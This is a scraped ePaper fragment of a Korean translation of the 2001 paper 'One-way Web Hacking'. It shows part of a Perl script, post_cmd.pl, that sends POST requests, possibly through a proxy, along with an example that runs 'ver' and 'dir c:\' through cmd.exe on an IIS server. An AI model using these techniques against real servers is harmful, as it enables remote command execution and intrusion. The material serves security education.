12.07.2013 Views

One-way Web Hacking

One-way Web Hacking

One-way Web Hacking

SHOW MORE
SHOW LESS

You also want an ePaper? Increase the reach of your titles

YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.

}<br />

print S 'POST '. $file. " HTTP/1.0\r\n";<br />

print S 'Host: '. $hostname. "\n";<br />

print S "Content-type: text/html\n";<br />

print S "Content-length: $content_length\n";<br />

foreach $i (@commands) {<br />

}<br />

print S $i;<br />

print S "\r\n";<br />

post_cmd.pl 를 구동시키기 위한 문장은 다음과 같다.<br />

usage: post_cmd.pl url [proxy:port] < data<br />

By Saumil Shah (c) net-square 2001<br />

post_cmd.pl takes all the data to be POSTed to the URL as<br />

standard input. Either enter the data manually and hit ^D (unix)<br />

or ^Z (dos) to end; or redirect the data using files or pipes<br />

post_cmd.pl은 역시 HTTP proxy 상으로 POST 리퀘스트를 터널링할 수 있도록 쓰여졌다. post_sh.pl 역시 비슷하다.<br />

아래의 예는 우리 자신의 POST 리퀘스트를 형성시키는 것 대시 Perl 스크립트를 사용해서도 같은 결과가 나오는 것을<br />

보여준다.<br />

post_cmd.pl 의 출력<br />

$ ./post_cmd.pl http://www1.example.com/scripts/cmd.exe<br />

ver<br />

dir c:\<br />

^D<br />

HTTP/1.1 200 OK<br />

Server: Microsoft-IIS/4.0

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!